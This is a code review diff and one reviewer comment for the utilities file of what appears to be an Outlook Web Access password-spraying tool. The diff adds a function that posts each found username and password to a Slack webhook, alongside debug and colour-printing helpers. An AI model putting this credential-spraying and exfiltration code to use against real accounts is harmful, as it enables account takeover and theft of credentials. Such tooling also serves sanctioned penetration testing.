utils/utils.py

```diff
@@ -49,3 +55,28 @@ def get_owa_domain(url, uri, useragent):
         return ntlm_info["NetBIOS_Domain_Name"]
     else:
         return "NOTFOUND"
+
+# Function for posting username/password to slack channel
+def slacknotify(username, password):
+    now = datetime.now()
+    webhook_url = configvars["slack_webhook"]
+    message = {"text": '```[PASSWORD SPRAY]\nUser: ' + username + '\nPass: ' + password + '\nDate: ' + now.strftime("%d-%m-%Y") + '\nTime: ' + now.strftime("%H:%M:%S") + '```'}
+    response = requests.post(
+        webhook_url, data=json.dumps(message),
+        headers={'Content-Type': 'application/json'}
+    )
+
+# Function for debug messages 
+def slackupdate(update_msg):
+    now = datetime.now()
+    webhook_url = configvars["slack_webhook"]
+    message = {"text": '```[DEBUG MESSAGE]\n' + update_msg + '\nDate: ' + now.strftime("%d-%m-%Y") + '\nTime: ' + now.strftime("%H:%M:%S") + '```'}
+    response = requests.post(
+        webhook_url, data=json.dumps(message),
+        headers={'Content-Type': 'application/json'}
+    )
+
+# Colour Functions - ZephrFish
+def prRed(skk): print("\033[91m {}\033[00m" .format(skk))
+def prGreen(skk): print("\033[92m {}\033[00m" .format(skk))
+def prYellow(skk): print("\033[93m {}\033[00m" .format(skk))
```

Comment:
Instead of printing the string, return it as a function like `return "\033[91m {}\033[00m".format(skk)`, this way it will be returned to the printing function properly and be printed with the appropriate timestamp